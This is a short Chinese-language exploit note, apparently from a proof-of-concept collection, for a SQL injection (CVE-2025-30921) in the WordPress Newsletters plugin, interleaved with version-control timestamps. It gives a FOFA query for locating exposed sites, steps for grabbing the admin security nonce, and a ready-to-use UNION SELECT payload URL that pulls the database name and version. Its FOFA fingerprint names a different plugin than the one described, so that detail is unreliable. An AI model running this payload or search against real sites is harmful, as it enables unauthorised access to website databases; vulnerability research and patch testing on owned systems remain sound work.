2025-04-07 11:31:51 +08:00
|
|
|
|
## WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921)
|
2025-04-07 11:27:04 +08:00
|
|
|
|
|
2025-04-07 11:31:51 +08:00
|
|
|
|
WordPress在Newsletters插件版本4.9.9.7或更低版本的插件仪表板中查看统计概览图表时/wp-admin/admin.php?page=newsletters,由于对URL参数的输入验证和转义处理不足,会发生SQL注入漏洞。
|
|
|
|
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
body="/wp-content/plugins/web-directory-free"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2025-04-07 11:32:41 +08:00
|
|
|
|
## 前提条件和Administrator权限
|
2025-04-07 11:31:51 +08:00
|
|
|
|
使用浏览器开发者工具,action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如,如果搜索结果如下所示,请记下22b1ac0de6
|
|
|
|
|
|
```
|
|
|
|
|
|
jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
2025-04-07 11:32:41 +08:00
|
|
|
|
## poc
|
2025-04-07 11:31:51 +08:00
|
|
|
|
```javascript
|
|
|
|
|
|
http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞来源
|
|
|
|
|
|
- https://github.com/DoTTak/CVE-2025-30921
|
